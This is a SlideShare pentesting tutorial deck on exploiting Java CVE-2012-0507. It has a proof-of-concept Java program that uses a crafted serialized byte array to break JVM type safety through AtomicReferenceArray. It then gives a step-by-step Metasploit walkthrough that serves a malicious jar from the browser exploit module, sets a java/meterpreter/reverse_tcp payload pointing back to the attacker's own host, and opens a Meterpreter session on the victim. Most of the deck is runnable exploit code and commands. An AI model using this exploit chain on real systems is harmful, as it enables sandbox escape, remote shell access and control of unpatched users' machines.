Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
PenTesting Tutorials:www.BreakTheSecurity.com
About CVE-2012-0507   A vulnerability in the JRE due to the fact that The    AtomicReferenceArray class implementation di...
public AtomicReferenceArray(E[] array) {     this.array = array.clone();}
import java.util.concurrent.atomic.*;class first{}public violateClass{public static void main(String a[]){Object obj=new f...
ExploitingBy manually constructing a serializedobject graph you can stick any array youwant into an AtomicReferenceArrayin...
Arbitrary reference to violatetype safety. import java.io.*; import java.util.concurrent.atomic.*; class Union1 { } class ...
Requirements:    VirtualBox    Target OS(windows,...)    PenTesting Distro(Backtrack )    JRE 6(unpatched version)
Preparing Target Machine   Start the "Target" Machine.    Install the JRE 6.(I have already    installed the JRE)
Preparing Attacker Machine Now, start the BT5. Open the Terminal and Type  "msfupdate". This will update the Metasploit ...
 Open the Terminal and type msfconsole Now type :     use exploit/multi/browser/java_atomicreferencearray   The above c...
   Now type "show options" to display the    settings available and/or required for this    specific module.
 set SRVPORT 80 set URIPATH / set SRVHOST [Backtrack_ip]How to get IP of Backtrack:    ○ open the Terminal    ○ Type if...
Payload   Type "show payloads“ . This will displays the    list of payloads available to use   I am going to use the rev...
 In order to get reverse connection, we  have to set Backtrack IP in the LHOST. So type the following command:     set L...
Are you ready?! Let us
 We have setup everything needed for the  Exploit. So it is time to break into the Target  machine. Type "exploit" in th...
   This will start the reverse handler to our    Machine and it will wait anyone that will    connect to the our HTTP ser...
Victim side   We have set up our exploit. Let us see what    happen when our victim open our url.   Go to the “Target” V...
   It loads nothing but in background : The Backtrack sends a jar file and  exploit the vulnerability. After successful...
    Now type "sessions“ in the metasploit    console, this will display the list of    active sessions(victims list)
    Type "sessions -i 1", this will open the    connection to the session with the id 1 and    bring you to Meterpreter ...
Exploited in the Wild   On April 2012, The research conducted by    Dr.Web determined that more than 600,000    Mac compu...
 I hope this article has given you a good  insight into how to use MetaSploit Framework  to exploit the Java vulnerabilit...
Exploiting java vulnerability [CVE-2012-0507 ]
Exploiting java vulnerability [CVE-2012-0507 ]
Upcoming SlideShare
Loading in …5
×

Exploiting java vulnerability [CVE-2012-0507 ]

2,729 views

Published on

CVE-2012-0507 is a vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. A malicious Java application or applet could use this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.

Published in: Education, Technology
  • Be the first to comment

Exploiting java vulnerability [CVE-2012-0507 ]

  1. 1. PenTesting Tutorials:www.BreakTheSecurity.com
  2. 2. About CVE-2012-0507 A vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. The vulnerability found by Jeroen Frijters A malicious Java application or applet could use this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.
  3. 3. public AtomicReferenceArray(E[] array) { this.array = array.clone();}
  4. 4. import java.util.concurrent.atomic.*;class first{}public violateClass{public static void main(String a[]){Object obj=new first();AtomicReferenceArray r=new AtomicReferenceArray(new first[1]);obj="Hell";r.set(0,obj);first f=(first)r.get(0);}}
  5. 5. ExploitingBy manually constructing a serializedobject graph you can stick any array youwant into an AtomicReferenceArrayinstance and then use theAtomicReferenceArray.set() method towrite an arbitrary reference to violate typesafety.
  6. 6. Arbitrary reference to violatetype safety. import java.io.*; import java.util.concurrent.atomic.*; class Union1 { } class Union2 { } public class test { static byte[] buf = new byte[] { -84, -19, 0, 5, 117, 114, 0, 19, 91, 76, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 79, 98, 106, 101, 99, 116, 59, -112, -50, 88, -97, 16, 115, 41, 108, 2, 0, 0, 120, 112, 0, 0, 0, 2, 117, 114, 0, 9, 91, 76, 85, 110, 105, 111, 110, 49, 59, -2, 44, -108, 17, -120, -74, -27, -1, 2, 0, 0, 120, 112, 0, 0, 0, 1, 112, 115, 114, 0, 48, 106, 97, 118, 97, 46, 117, 116, 105, 108, 46, 99, 111, 110, 99, 117, 114, 114, 101, 110, 116, 46, 97, 116, 111, 109, 105, 99, 46, 65, 116, 111, 109, 105, 99, 82, 101, 102, 101, 114, 101, 110, 99, 101, 65, 114, 114, 97, 121, -87, -46, -34, -95, -66, 101, 96, 12, 2, 0, 1, 91, 0, 5, 97, 114, 114, 97, 121, 116, 0, 19, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 120, 112, 113, 0, 126, 0, 3 }; public static void main(String[] args) throws Throwable { ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(buf)); Object[] arr = (Object[])ois.readObject(); Union1[] u1 = (Union1[])arr[0]; AtomicReferenceArray ara = (AtomicReferenceArray)arr[1]; ara.set(0, new Union2()); System.out.println(u1[0]); } }
  7. 7. Requirements:  VirtualBox  Target OS(windows,...)  PenTesting Distro(Backtrack )  JRE 6(unpatched version)
  8. 8. Preparing Target Machine Start the "Target" Machine. Install the JRE 6.(I have already installed the JRE)
  9. 9. Preparing Attacker Machine Now, start the BT5. Open the Terminal and Type "msfupdate". This will update the Metasploit Framework(MSF) with the latest exploits.
  10. 10.  Open the Terminal and type msfconsole Now type : use exploit/multi/browser/java_atomicreferencearray The above command will use the java_atomicreferencearray.rb module for the attack.
  11. 11.  Now type "show options" to display the settings available and/or required for this specific module.
  12. 12.  set SRVPORT 80 set URIPATH / set SRVHOST [Backtrack_ip]How to get IP of Backtrack: ○ open the Terminal ○ Type ifconfig ○ It will display the IP
  13. 13. Payload Type "show payloads“ . This will displays the list of payloads available to use I am going to use the reverse_tcp payload. This payload will get reverse tcp connection from the Target to our machine. Type set payload java/meterpreter/reverse_tcp
  14. 14.  In order to get reverse connection, we have to set Backtrack IP in the LHOST. So type the following command: set LHOST [Backtrack_IP]
  15. 15. Are you ready?! Let us
  16. 16.  We have setup everything needed for the Exploit. So it is time to break into the Target machine. Type "exploit" in the msfconsole.
  17. 17.  This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: http://192.168.56.102) Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.
  18. 18. Victim side We have set up our exploit. Let us see what happen when our victim open our url. Go to the “Target” VM. Open the Firefox Enter the url you got from the you got from the metasploit exploit: Eg: http://192.168.56.102 No need to care about the „80‟ in the URL becoz It is default port 
  19. 19.  It loads nothing but in background : The Backtrack sends a jar file and exploit the vulnerability. After successful exploit, it brings control to Backtrack 
  20. 20.  Now type "sessions“ in the metasploit console, this will display the list of active sessions(victims list)
  21. 21.  Type "sessions -i 1", this will open the connection to the session with the id 1 and bring you to Meterpreter Meterpreter will help you to interact/control with the Target
  22. 22. Exploited in the Wild On April 2012, The research conducted by Dr.Web determined that more than 600,000 Mac computers are infected with BackDoor.Flashback botnet. Included in Exploit kits
  23. 23.  I hope this article has given you a good insight into how to use MetaSploit Framework to exploit the Java vulnerability. I hope this will help you to get into the PenTesting world..!  For more PenTesting Tutorials : www.BreakTheSecurity.com

×